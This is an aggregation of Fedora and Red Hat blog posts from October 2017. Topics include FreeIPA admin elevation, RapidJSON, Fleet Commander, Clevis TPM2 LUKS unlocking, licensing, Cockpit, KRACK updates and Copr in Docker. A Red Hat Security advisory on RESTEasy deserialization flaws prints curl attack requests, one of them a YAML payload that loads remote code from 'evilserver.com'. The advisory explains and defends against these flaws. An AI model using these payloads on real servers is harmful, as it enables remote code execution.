This heightened degree of security supports the audit trail. Now if someone performs and admin operation, we know which user did it. It involves enabling audit on the Directory Server (I need to learn how to do this!).

It got me thinking, though, if there was a mechanism like the sudo approach that we could implement for users to temporarily elevate them to admins status. Something like a short term group membership. The requirements, as I can see are these:

  1. A user has to chose to be admin:  “admin-powers activate!”
  2. A user can downgrade back to non-admin at any point: “admin-powers activate!”
  3. Admin powers wear off.  admin-powers only last an hour
  4. No new password has to be memorized for admin-powers
  5. The mechanism for admin-powers has to be resistant to attack.
    1. customizable enough that someone outside the organization can’t guess what they are.
    2. provide some way to prevent shoulder surfing.

I’m going to provide a straw-man here.

  • A REST API protected via SPNEGO
    • another endpoint with client cert possible, too
  • The REST API is password protected with basic-auth.  This is the group password.
  • The IPA service running the web server has the ability to add anyone that is in the “potentaladmins” group to the “admins” groups”
  • The IPA service also schedules an AT job to remove the user from the group.  If an AT entry already exists, remove the older one, so a user can extend their window.
  • A cron job runs each night to remove anyone from the admin group that does not have a current at job scheduled.

As I said, a strawman, but I think it points in the right direction.  Thoughts?

Understanding RapidJson – Part 2

Posted by Subhendu Ghosh on October 18, 2017 02:38 PM

In my previous blog on Rapidjson, alot of people asked for a detailed example in the comments so here is part 2 of Understanding Rapidjson with a slightly detailed example. I hope this will help you all.

We will straightaway improve on my last example in the previous blog and modify the changeDom function to add more complex object to the DOM tree.

template <typename Document>
void changeDom(Document& d){
Value& node = d["hello"];
node.SetString("c++");
Document subdoc(&d.GetAllocator());
subdoc.SetObject(); // starting the object
Value arr(kArrayType); // the innermost array
 Value::AllocatorType allocator;
for (unsigned i = 0; i < 10; i++)
arr.PushBack(i, allocator); // adding values to array , this function expects an allocator object
// adding the array to its parent object and so on , finally adding it to the parent doc object
subdoc.AddMember("New", Value(kObjectType).Move().AddMember("Numbers",arr, allocator), subdoc.GetAllocator());
d.AddMember("testing",subdoc, d.GetAllocator()); // finally adding the sub document to the main doc object
d["f"] = true;
d["t"].SetBool(false);
}

Here we are creating Value objects of type kArrayType and kObjectType and appending them to their parent node from innermost to outermost.

Before Manupulation
{
 "hello": "world",
 "t": true,
 "f": false,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
 0,
 1,
 2,
 3
 ]
}
After Manupulation
{
 "hello": "c++",
 "t": false,
 "f": true,
 "n": null,
 "i": 123,
 "pi": 3.1416,
 "a": [
    0,
    1,
    2,
    3
  ],
 "testing": {
     "New": {
         "Numbers": [
             0,
             1,
             2,
             3,
             4,
             5,
             6,
             7,
             8,
             9
         ]
     }
 }
}

The above changeDom can also be written using prettywritter object as follows:

template <typename Document>
void changeDom(Document& d){
Value& node = d["hello"];
node.SetString("c++");
Document subdoc(&d.GetAllocator()); // sub-document
// old school write the json element by element
StringBuffer s;
PrettyWriter<StringBuffer> writer(s);
writer.StartObject();
writer.String("New");
writer.StartObject();
writer.String("Numbers");
writer.StartArray();
for (unsigned i = 0; i < 10; i++)
writer.Uint(i);
writer.EndArray();
writer.EndObject();
writer.EndObject();
subdoc.Parse(s.GetString()); // Parsing the string written to buffer to form a sub DOM

d.AddMember("testing",subdoc, d.GetAllocator()); // Attaching the Sub DOM to the Main DOM object
d["f"] = true;
d["t"].SetBool(false);
}

Happy Coding! Cheers.

More reads:
https://stackoverflow.com/questions/32896695/rapidjson-add-external-sub-document-to-document


Abuse of RESTEasy Default Providers in JBoss EAP

Posted by Red Hat Security on October 18, 2017 01:30 PM

Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the Content-Type HTTP Header which the client specifies. Some of the default providers where found to have vulnerabilities which have now been removed from JBoss EAP and it's upstream Restful webservice project, RESTEasy.

The attack vector

There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:

  • @Consumes annotation was present specifying wildcard mediaType {*/*}
  • @Consumes annotation was not present on webservice endpoint
  • Webservice endpoint consumes a multipart mediaType

Here's an example of what a vulnerable webservice would look like:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }

}

Notice how there is no @Consumes annotation on the doConcat method.

The vulnerabilities

CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream1 before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending a HTTP Request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializationProvider and could contain a malicious payload generated with ysoserial2 or similar. A remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

Here's an example:

curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'

CVE-2016-9606 also exploited the default providers of Resteasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the Snakeyaml library from Resteasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

SnakeYaml allows loading classes with a URLClassloader, using it's ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.

An example of a malicious request is as follows:

curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat

Where evilserver.com is a host controlled by the malicious actor

Again, you can see the use of Content-Type, HTTP Header, which tricks RESTEasy into using YamlProvider, even though the developer didn't intend for it to be accessible.

How to stay safe

The latest versions of EAP 6.4.x, and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either of EAP 6.4.x, or 7.0.x.

If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        @Consumes("application/json")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }

}

Notice this safe version added a @Consumes annotation with a mediaType of application/json

This is good practice anyway, because if a HTTP client tries to send a request with a different Content-Type HTTP Header the application will give an appropriate error response, indicating that the Content-Type is not supported.


  1. https://issues.jboss.org/browse/RESTEASY-1269 

  2. https://github.com/frohoff/ysoserial 

Product

Red Hat JBoss Enterprise Application Platform

Category

Secure

Tags

jaxrs webservices

Fleet Commander ready for takeoff!

Posted by Christian F.K. Schaller on October 18, 2017 12:01 PM

Alberto Ruiz just announced Fleet Commander as production ready! Fleet Commander is our new tool for managing large deployments of Fedora Workstation and RHEL desktop systems. So get our to Albertos Fleet Commander blog post for all the details.

Fleet Commander: production ready!

Posted by Alberto Ruiz on October 18, 2017 11:56 AM

It’s been awhile since I last wrote any updates about Fleet Commander, that’s not to say that there hasn’t been any progress since 0.8. In many senses we (Oliver and I) feel like we should present Fleet Commander as a shiny new project now as many changes have gone through and this is the first release we feel is robust enough to call it production ready.

What is Fleet Commander?

For those missing some background, let me introduce Fleet Commander for you, Fleet Commander is an integrated solution for large Linux desktop deployments that provides a configuration management interface that is controlled centrally and that covers desktop, applications and network configuration. For people familiar with Group Policy Objects in Active Directory in Windows, it is very similar.

Many people ask why not use other popular Linux configuration management tools like Ansible or Puppet, the answer is simple, those are designed for servers that run in a controlled environment like a data center or the cloud, it follows a push model where the configuration changes happen as a series of commands run in the server. If something goes wrong it is easy to audit and rollback if you have access to that server. However desktop machines in large corporate environments can run many times behind a NAT on a public WiFi, think a laptop owned by an on-site support engineer that roams from site to site. Fleet Commander pulls a bunch of configuration data and makes it available to apps without running intrusive shell scripts or walking in into users’ $HOME directory. Ansible and puppet did not solve the core problems of desktop session configuration management so we had to create something new.

At Red Hat we talk to many enterprise desktop customers with a mixed environment of Windows, Macs and Linux desktops and our interaction with them has helped us identify this gap in the GNOME ecosystem and motivated us to roll up our sleeves and try to come up with an answer.

How to build a profile

The way Fleet Commander works when building profiles is somewhat interesting compared to its competitors. We’ve inspired our solution on the good old Sabayon tool. On our admin web UI you get a VM desktop session where you run and configure your apps, Fleet Commander will record those changes and list them. The user will select them and the final selection will get bound together as part of the profile.

You can then apply the profile to individual users, groups, hosts or host groups.

07_live_session_change_review-94862769.png

Supported apps/settings

Right now we support anything dconf based (GSettings), GNOME Online Accounts, LibreOffice and NetworkManager. In the near future we plan to tackle our main problem which is giving support to browsers, we’re probably going to start just with bookmarks as it is the most demanded use case.

Cockpit integration

02_fc_loading_screen-ecb820e0

The Fleet Commander UI runs on top of the Cockpit admin UI. Cockpit has given us a lot of stuff for free (a basic UI framework, a web service, built-in websocket support for our SPICE javascript client, among many other things).

FreeIPA Integration

A desktop configuration management solution has to be tightly tied to an identity management solution, (like in Active Directory), FreeIPA is the best Free Software corporate identity management project out there and integrating with it allowed us to remove quite a bit of complexity from our code base while improving security. FreeIPA now stores the profile data and the assignments to users, groups and hosts.

SSSD

SSSD is the client daemon that enrolls and authenticates a Linux machine in a FreeIPA or Active Directory domain, having fleet commander hooking into it was a perfect fit for us and also allowed us to remove a bunch of code from previous versions while having a much more robust implementation. SSSD now retrieves and stores the profile data from FreeIPA.

fleet-commander.org

Our new website is live! We have updated introduction materials and documentation and jimmac has put together a great design and layout. Check it out!
I’d like to thank Alexander Bokovoy and Fabiano Fidencio for their invaluable help extending FreeIPA and SSSD to integrate with Fleet Commander and Jakub for his help on the website design. If you want to know more, join us on our IRC channel (#fleet-commander @ freenode) and our GitHub project page.

It is currently available in Fedora 26 and we are in the process of releasing EPEL packages for CentOS/RHEL.

Automatic LUKS volumes unlocking using a TPM2 chip

Posted by Javier Martinez Canillas on October 18, 2017 08:59 AM

I joined Red Hat a few months ago, and have been working on improving the Trusted Platform Module 2.0 (TPM2) tooling, towards having a better TPM2 support for Fedora on UEFI systems.

For brevity I won’t explain in this post what TPMs are and their features, but assume that readers are already familiar with trusted computing in general. Instead, I’ll explain what we have been working on, the approach used and what you might expect on Fedora soon.

For an introduction to TPM, I recommend Matthew Garret’s excellent posts about the topic, Philip Tricca’s presentation about TPM2 and the official Trusted Computing Group (TCG) specifications. I also found “A Practical Guide to TPM 2.0” book to be much easier to digest than the official TCG documentation. The book is an open access one, which means that’s freely available.

LUKS volumes unlocking using a TPM2 device

Encryption of data at rest is a key component of security.  LUKS provides the ability to encrypt Linux volumes, including both data volumes and the root volume containing the OS. The OS can provide the crypto keys for data volumes, but something has to provide the key for the root volume to allow the system to boot.

The most common way to provide the crypto key to unlock a LUKS volume,  is to have a user type in a LUKS pass-phase during boot. This works well for laptop and desktop systems, but is not well suited for servers or virtual machines since is an obstacle for automation.

So the first TPM feature we want to add to Fedora (and likely one of the most common use cases for a TPM) is the ability to bind a LUKS volume master key to a TPM2. That way the volume can be automatically unlocked (without typing a pass-phrase) by using the TPM2 to obtain the master key.

A key point here is that the actual LUKS master key is not present in plain text form on the system, it is protected by TPM encryption.

Also, by sealing the LUKS master key with a specific set of Platform Configuration Registers (PCR), one can make sure that the volume will only be unlocked if the system has not been tampered with. For example (as explained in this post), PCR7 is used to measure the UEFI Secure Boot policy and keys. So the LUKS master key can be sealed against this PCR, to avoid unsealing it if Secure Boot was disabled or the used keys were replaced.

Implementation details: Clevis

Clevis is a plugable framework for automated decryption that has a number of “pins”, where each pin implements an {en,de}cryption support using a different backend. It also has a command line interface to {en,de}crypt data using these pins, create complex security policies and bind a pin to a LUKS volume to later unlock it.

Clevis relies on the José project, which is an C implementation of the Javascript Object Signing and Encryption (JOSE) standard. It also uses the LUKSMeta project to store a Clevis pin metadata in a LUKS volume header.

On encryption, a Clevis pin takes some data to encrypt and a JSON configuration to produce a JSON Web Encryption (JWE) content. This JWE has the data encrypted using a JSON Web KEY (JWK) and information on how to obtain the JWK for decryption.

On decryption, the Clevis pin obtains a JWK using the information provided by a JWE and decrypts the ciphertext also stored in the JWE using that key.

Each Clevis pin defines their own JSON configuration format, how the JWK is created, where is stored and how to retrieve it.

As mentioned, Clevis has support to bind a pin with a LUKS volume. This means that a LUKS master key is encrypted using a pin and the resulting JWE is stored in a LUKS volume meta header. That way Clevis is able to later decrypt the master key and unlock the LUKS volume. Clevis has dracut and udisks2 support to do this automatically and the next version of Clevis will also include a command line tool to unlock non-root (data) volumes.

Clevis TPM2 pin

Clevis provides a mechanism to automatically supply the LUKS master key for the root volume. The initial implementation of Clevis has support to obtain the LUKS master key from a network service, but we have extended Clevis to take advantage of a TPM2 chip, which is available on most servers, desktops and laptops.

By using a TPM, the disk can only be unlocked on a specific system – the disk will neither boot nor be accessed on another machine.

This implementation also works with UEFI Secure Boot, which will prevent the system from being booted if the firmware or system configuration has been modified or tampered with.

To make use of all the Clevis infrastructure and also be able to use the TPM2 as a part of more complex security policies, the TPM2 support was implemented as a clevis tpm2 pin.

On encryption the tpm2 pin generates a JWK, creates an object in the TPM2 with the JWK as sensitive data and binds the object (or seals if a PCR set is defined in the JSON configuration) to the TPM2.

The generated JWE contains both the public and wrapped sensitive portions of the created object, as well as information on how to unseal it from the TPM2 (hashing and key encryption algorithms used to recalculate the primary key, PCR policy for authentication, etc).

On decryption the tpm2 pin takes the JWE that contains both the sealed object and information on how to unseal it,  loads the object into the TPM2 by using the public and wrapped sensitive portions and unseals the JWK to decrypt the ciphertext stored in the JWE.

The changes haven’t been merged yet, since the pin is using features from tpm2-tools master so we have to wait for the next release of the tools. And also there are still discussions on the pull request about some details, but it should be ready to land soon.

Usage

The Clevis command line tools can be used to encrypt and decrypt data using a TPM2 chip. The tpm2 pin has reasonable defaults but one can configure most of its parameters using the pin JSON configuration (refer to the Clevis tpm2 pin documentation for these), e.g:

$ echo foo | clevis encrypt tpm2 '{}' > secret.jwe

And then the data can later be decrypted with:

$ clevis decrypt < secret.jwe
foo

To seal data against a set of PCRs:

$ echo foo | clevis encrypt tpm2 '{"pcr_ids":"8,9"}' > secret.jwe

And to bind a tpm2 pin to a LUKS volume:

$ clevis luks bind -d /dev/sda3 tpm2 '{"pcr_ids":"7"}'

The LUKS master key is not stored in raw format, but instead is wrapped with a JWK that has the same entropy than the LUKS master key. It’s this JWK that is sealed with the TPM2.

Since Clevis has both dracut and udisks2 hooks, the command above is enough to have the LUKS volume be automatically unlocked using the TPM2.

The next version of Clevis also has a clevis-luks-unlock command line tool, so a LUKS volume could be manually unlocked with:

$ clevis luks unlock -d /dev/sda3

Using the TPM2 as a part of more complex security policies

One of Clevis supported pins is the Shamir Shared Secret (SSS) pin, that allows to encrypt a secret using a JWK that is then split into different parts. Each part is then encrypted using another pin and a threshold is chose to decide how many parts are needed to reconstruct the encryption key, so the secret can be decrypted.

This allows for example to split the JWK used to wrap the LUKS mater key in two parts. One part of the JWK could be sealed with the TPM2 and another part be stored in a remote server. By sealing a JWK that’s only one part of the needed key to decrypt the LUKS master key, an attacker obtaining the data sealed in the TPM won’t be able to unlock the LUKS volume.

The Clevis encrypt command for this particular example would be:

$ clevis luks bind -d /dev/sda3 sss '{"t": 2, "pins": \
  {"http":{"url":"http://server.local/key"}, "tpm2": \
  {"pcr_ids":"7"}}}'

Limitations of this approach

One problem with the current implementation is that Clevis is a user-space tool and so it can’t be used to unlock a LUKS volume that has an encrypted /boot directory. The boot partition still needs to remain unencrypted so the bootloader is able to load a Linux kernel and an initramfs that contains Clevis, to unlock the encrypted LUKS volume for the root partition.

Since the initramfs is not signed on a Secure Boot setup, an attacker could replace the initramfs and unlock the LUKS volume. So the threat model meant to protect is for an attacker that can get access to the encrypted volume but not to the trusted machine.

There are different approaches to solve this limitation. The previously mentioned post from Matthew Garret suggests to have a small initramfs that’s built into the signed Linux kernel. The only task for this built-in initramfs would be to unseal the LUKS master key, store it into the kernel keyring and extend PCR7 so the key can’t be unsealed again. Later the usual initramfs can unlock the LUKS volume by using the key already stored in the Linux kernel.

Another approach is to also have the /boot directory in an encrypted LUKS volume and provide support for the bootloader to unseal the master key with the TPM2, for example by supporting the same JWE format in the LUKS meta header used by Clevis. That way only a signed bootloader would be able to unlock the LUKS volume that contains /boot, so an attacker won’t be able to tamper the system by replacing the initramfs since it will be in an encrypted partition.

But there is work to be done for both approaches, so it will take some time until we have protection for this threat model.

Still, having an encrypted root partition that is only automatically unlocked on a trusted machine has many use cases. To list a few examples:

  • Stolen physical disks or virtual machines images can’t be mounted on a different machine.
  • An external storage media can be bind to a set of machines, so it can be automatically unlocked only on trusted machines.
  • A TPM2 chip can be reset before sending a laptop to repair, that way the LUKS volume can’t be automatically unlocked anymore.
  • An encrypted volume can be bound to a TPM2 if there is no risk of someone having physical access to the machine but unbound again when there is risk. So the machine can be automatically unlocked on safe places but allow to require a pass-phrase on unsafe places.

Acknowledgements

I would like to thanks Nathaniel McCallum and Russell Doty for their feedback and suggestions for this article.


Copyleft is Dead. Long live Copyleft!

Posted by James Just James on October 18, 2017 01:22 AM

As you may have noticed, we recently re-licensed mgmt from the AGPL (Affero General Public License) to the regular GPL. This is a post explaining the decision and which hopefully includes some insights at the intersection of technology and legal issues.

Disclaimer:

I am not a lawyer, and these are not necessarily the opinions of my employer. I think I’m knowledgeable in this area, but I’m happy to be corrected in the comments. I’m friends with a number of lawyers, and they like to include disclaimer sections, so I’ll include this so that I blend in better.

Background:

It’s well understood in infrastructure coding that the control of, and trust in the software is paramount. It can be risky basing your business off of a product if the vendor has the ultimate ability to change the behaviour, discontinue the software, make it prohibitively expensive, or in the extreme case, use it as a backdoor for corporate espionage.

While many businesses have realized this, it’s unfortunate that many individuals have not. The difference might be protecting corporate secrets vs. individual freedoms, but that’s a discussion for another time. I use Fedora and GNOME, and don’t have any Apple products, but you might value the temporary convenience more. I also support your personal choice to use the software you want. (Not sarcasm.)

This is one reason why Red Hat has done so well. If they ever mistreated their customers, they’d be able to fork and grow new communities. The lack of an asymmetrical power dynamic keeps customers feeling safe and happy!

Section 13:

The main difference between the AGPL and the GPL is the “Remote Network Interaction” section. Here’s a simplified explanation:

Both licenses require that if you modify the code, you give back your contributions. “Copyleft” is Copyright law that legally requires this share-alike provision. These licenses never require this when using the software privately, whether as an individual or within a company. The thing that “activates” the licenses is distribution. If you sell or give someone a modified copy of the program, then you must also include the source code.

The AGPL extends the GPL in that it also activates the license if that software runs on a application providers computer which is common with hosted software-as-a-service. In other words, if you were an external user of a web calendaring solution containing AGPL software, then that provider would have to offer up the code to the application, whereas the GPL would not require this, and neither license would require distribution of code if the application was only available to employees of that company nor would it require distribution of the software used to deploy the calendaring software.

Network Effects and Configuration Management:

If you’re familiar with the infrastructure automation space, you’re probably already aware of three interesting facts:

  1. Hosted configuration management as a service probably isn’t plausible
  2. The infrastructure automation your product uses isn’t the product
  3. Copyleft does not apply to the code or declarations that describe your configuration

As a result of this, it’s unlikely that the Section 13 requirement of the AGPL would actually ever apply to anyone using mgmt!

A number of high profile organizations outright forbid the use of the AGPL. Google and Openstack are two notable examples. There are others. Many claim this is because the cost of legal compliance is high. One argument I heard is that it’s because they live in fear that their entire proprietary software development business would be turned on its head if some sufficiently important library was AGPL. Despite weak enforcement, and with many companies flouting the GPL, Linux and the software industry have not shown signs of waning. Compliance has even helped their bottom line.

Nevertheless, as a result of misunderstanding, fear and doubt, using the AGPL still cuts off a portion of your potential contributors. Possible overzealous enforcing has also probably caused some to fear the GPL.

Foundations and Permissive Licensing:

Why use copyleft at all? Copyleft is an inexpensive way of keeping the various contributors honest. It provides an organization constitution so that community members that invest in the project all get a fair, representative stake.

In the corporate world, there is a lot of governance in the form of “foundations”. The most well-known ones exist in the United States and are usually classified as 501(c)(6) under US Federal tax law. They aren’t allowed to generate a profit, but they exist to fulfill the desires of their dues-paying membership. You’ve probably heard of the Linux Foundation, the .NET foundation, the OpenStack Foundation, and the recent Linux Foundation child, the CNCF. With the major exception being Linux, they primarily fund permissively licensed projects since that’s what their members demand, and the foundation probably also helps convince some percentage of their membership into voluntarily contributing back code.

Running an organization like this is possible, but it certainly adds a layer of overhead that I don’t think is necessary for mgmt at this point.

It’s also interesting to note that of the top corporate contributions to open source, virtually all of the licensing is permissive, usually under the Apache v2 license. I’m not against using or contributing to permissively licensed projects, but I do think there’s a danger if most of our software becomes a monoculture of non-copyleft, and I wanted to take a stand against that trend.

Innovation:

I started mgmt to show that there was still innovation to be done in the automation space, and I think I’ve achieved that. I still have more to prove, but I think I’m on the right path. I also wanted to innovate in licensing by showing that the AGPL isn’t actually  harmful. I’m sad to say that I’ve lost that battle, and that maybe it was too hard to innovate in too many different places simultaneously.

Red Hat has been my main source of funding for this work up until now, and I’m grateful for that, but I’m sad to say that they’ve officially set my time quota to zero. Without their support, I just don’t have the energy to innovate in both areas. I’m sad to say it, but I’m more interested in the technical advancements than I am in the licensing progress it might have brought to our software ecosystem.

Conclusion / TL;DR:

If you, your organization, or someone you know would like to help fund my mgmt work either via a development grant, contract or offer of employment, or if you’d like to be a contributor to the project, please let me know! Without your support, mgmt will die.

Happy Hacking,

James

You can follow James on Twitter for more frequent updates and other random noise.

EDIT: I mentioned in my article that: “Hosted configuration management as a service probably isn’t plausible“. Turns out I was wrong. The splendiferous Nathen Harvey was kind enough to point out that Chef offers a hosted solution! It’s free for five hosts as well!

I was probably thinking more about how I would be using mgmt, and not about the greater ecosystem. If you’d like to build or use a hosted mgmt solution, please let me know!


Cómo vivir sin Google

Posted by Fernando Espinoza on October 17, 2017 05:56 PM

¿Eliminar a Google de tu vida? ¡Sí, se puede hacer! Los rastreadores de Google se han encontrado en el 75% de los principales sitios web de millones . Esto significa que no solo rastrean lo que busca, también rastrean los sitios web que visita y usan todos sus datos para los anuncios que lo siguen por Internet. Sus datos personales... Seguir leyendo →


Cockpit 153

Posted by Cockpit Project on October 17, 2017 10:00 AM

Cockpit is the modern Linux admin interface. We release regularly. Here are the release notes from version 153.

Add oVirt package

This version introduces the “oVirt Machines” page on Fedora for controlling oVirt virtual machine clusters. This code was moved into Cockpit as it shares a lot of code with the existing “Machines” page, which manages virtual machines through libvirt.

This feature is packaged in cockpit-ovirt and when installed it will replace the “Machines” page.

oVirt overview

Packaging cleanup

This release fixes a lot of small packaging issues that were spotted by rpmlint/lintian.

Try it out

Cockpit 153 is available now:

Protect your wifi on Fedora against KRACK

Posted by Fedora Magazine on October 17, 2017 12:23 AM

You may have heard about KRACK (for “Key Reinstallation Attack”), a vulnerability in WPA2-protected Wi-Fi. This attack could let attackers decrypt, forge, or steal data, despite WPA2’s improved encryption capabilities. Fear not — fixes for Fedora packages are on their way to stable.

Guarding against KRACK

New wpa_supplicant packages contain the fix for Fedora 25, 26, and 27, as well as Rawhide. The maintainers have submitted them to the stable repos. They should show up within a day or so for most users.

To update your Fedora system, use this command once you configure sudo. Type your password at the prompt, if necessary.

sudo dnf update wpa_supplicant

Fedora provides worldwide mirrors at many download sites to better serve users. Some sites refresh their mirrors at different rates. If you don’t get an update right away, wait until later in the day.

Updating immediately

If you’re worried about waiting until stable updates show up, use this process to get the packages. First, install the bodhi-client package:

sudo dnf install bodhi-client

Then note the build ID for your Fedora system:

  • Fedora 27 prerelease: wpa_supplicant-2.6-11.fc27
  • Fedora 26: wpa_supplicant-2.6-11.fc26
  • Fedora 25: wpa_supplicant-2.6-3.fc25.1

Now download the packages for your system and update them. This example is for Fedora 26:

mkdir ~/krack-update && cd ~/krack-update
bodhi updates download --builds wpa_supplicant-2.6-11.fc26
dnf update ./wpa_supplicant*.rpm

If your system is on Rawhide, run sudo dnf update to get the update.

Copr stack dockerized!

Posted by Jakub Kadlčík on October 17, 2017 12:00 AM

Lately, I decided to dockerize the whole Copr stack and utilize it for development. It is quite nifty and just ridiculously easy to use. In this article, I want to show you how to run it, describe what is inside the containers and explain my personal workflow.

There are no prerequisites required, you only need to have properly configured docker and docker-compose command installed.

Usage

Have I already said, that it is ridiculously easy to use? Just run following command in the copr root directory.

docker-compose up -d

It builds images for all Copr services and runs containers from them. Once it is done, you should be able to open http://127.0.0.1:5000 and successfully build a package in it.

How so?

There is a docker-compose.yaml file in the copr root directory, which describes all the Copr services and ties them together. At this point, we have a frontend, distgit, backend and database. This may change in the future by splitting the functionality across more containers.

In copr repository also lies a directory called docker which contains the corresponding Dockerfile for each service.

All the images are built in the same way. First, the whole copr repository is copied in. Then the tito is used to build an appropriate package for the service. It is installed, configured and started. The only exception here is the database, which just setups a simple PostgreSQL server.

The parent process for the services running in containers is a supervisord so they can be controlled via supervisorctl command.

In the containers is also bind mounted live version of copr repository to the /opt/copr.

Cheat sheet

How can I see running containers?

docker-compose ps

Why doesn’t some container start as expected?

docker-compose logs --follow

How can I open a shell in the container?

docker exec -it <name> bash

How can I see running services in the container?

supervisorctl status

How can I control services in the container?

supervisorctl start/stop/restart all/<name>

How can I throw away a changes, that I made inside the container

docker-compose up -d --force-recreate <service>

My personal workflow

Are you familiar with utilizing containers for development? Just stop reading here. This section describes my personal preferences and you might not endorse them. That is fine, I am not trying to force you to do it my way. However, I think that it is a good idea to describe them, so new team members (or even the current ones) can inspire themselves. Also, if everyone described their setup, we would be clear on what we need to support.

In case that you haven’t read the post about my vagrant setup, you should do it. The workflow remains exactly the same, just the tools changed. Let’s have a frontend as an example.

Once we have a running container for the frontend, we can open a shell in it and do

supervisorctl stop httpd
python /opt/copr/frontend/coprs_frontend/manage.py runserver -p 80 -h 0.0.0.0

to stop the service from a pre-installed package and run a built-in server from the live code. It allows us to try uncommitted changes (duh) or use tools like ipdb.

Alternatively, for distgit, we can use

supervisorctl stop copr-dist-git
PYTHONPATH=/opt/copr/dist-git /opt/copr/dist-git/run/importer_runner.py

Resources

  1. https://developer.fedoraproject.org/tools/docker/about.html
  2. https://docs.docker.com/compose/overview/
  3. https://devcenter.heroku.com/articles/local-development-with-docker-compose

Linux Autumn 2017

Posted by Rafał Lużyński on October 16, 2017 11:01 PM

Autumn

Linux Autumn is an annual Polish conference dedicated to the free software and GNU/Linux. This year it was its 15th edition and this time it was held in Muflon Leisure Center in Ustroń.

Shortly speaking: the conference was interesting but my participation was limited due to a virus¹ attack.

Day #1: September 22

Not much has been planned for that day because the attendees were only arriving. The event started at 4 PM and the first speaker was Igor Gnatenko from Red Hat. He talked about the dependencies between the packages, especially about the new kinds of dependencies added in RPM 4.14. I was a little late to this talk but thanks to YouTube I know how it was like and I must admit that it was interesting. I like the idea of a talk which focuses on a small subject which do not requires advanced skills to understand it and at the same time provides important information to the attendees. It’s very worth to be mentioned here as it was the only talk in English:

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="281" src="https://www.youtube.com/embed/ux2lN-KsMxI?start=474&amp;feature=oembed" width="500"></iframe>

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="281" src="https://www.youtube.com/embed/HB-spEtBpCo?feature=oembed" width="500"></iframe>

The second speaker was myself. I talked about preparing an application for internationalization and avoiding typical errors. How it was – you should judge on your own. Unfortunately, this talk and all others were in Polish and English translations do not exist so I don’t provide links here.

My talk about preparing an application for internationalization. Photo: Igor Gnatenko.

In the evening there was a dinner and long conversation about professional and non-professional subjects.

Day #2: September 23

In the morning I woke up with a sore throat and I knew that the conference is actually over for me. Luckily, I had given my talk the previous day when I still had felt good. Despite this I pulled myself together and attended all talks. I’d like to mention two most interesting ones in my opinion. The first was Maciej Nabożny‘s talk about his libdinemic project. In his talk he included many subjects like cryptography, certificates, but first of all Maciej comprehensibly explained how blockchain works and how it powers bitcoin. The second talk was by Dariusz Puchalak about OpenSSH, Ansible and other network tools. Usually I’m less interested in administrative stuff than programming but Dariusz’ talk was really zestful and impressed me. I recommend his talks to everyone, he is a really great speaker.

Piotr Kliczewski from Red Hat talks about oVirt

Day #3: September 24

So this was really the end for me. In the night I had a fever, shortly after the breakfast I packed my things, said goodbye and went back home. I wish I could recommend you watching the videos on YouTube, unfortunately they are mostly in Polish. Please come next year, the more foreign speakers and attendees we have the more likely we switch to English.

PS. Regarding the virus, as it usually happens, the next day I felt much better and two days later I was quite good.


¹ Virus: a biological structure similar to but unrelated with computer viruses. They attack the cells of living organisms and are totally safe for computers.

What I have found interesting in Fedora during the week 41 of 2017

Posted by Fedora Community Blog on October 16, 2017 06:49 PM

After a week I would like to share some activities which happened during the past week:

Fedora 27 Server Beta is No-Go

On Thursday, 2017-Oct-12, we had Go/No-Go meeting for the delayed F27 Beta release of the Server (modular) edition.  Result of the meeting is No-Go due to missing Release Candidate compose. We are going to run another round of the Go/No-Go meeting on Thursday, 2017-Oct-19 at 17:00 UTC, where we are going to determine the readiness of the F27 Server edition for Beta release. On Friday 2017-Oct-13 FESCo has allowed use of the Rain/Target date scheduling for the F27 Server Beta, so even we slip the F27 Server Beta for one week, the Final F27 Server release is not affected, for now.

New OpenStack SIG

Haïkel has announced a new SIG focused on OpenStack.

Firefox 57 update

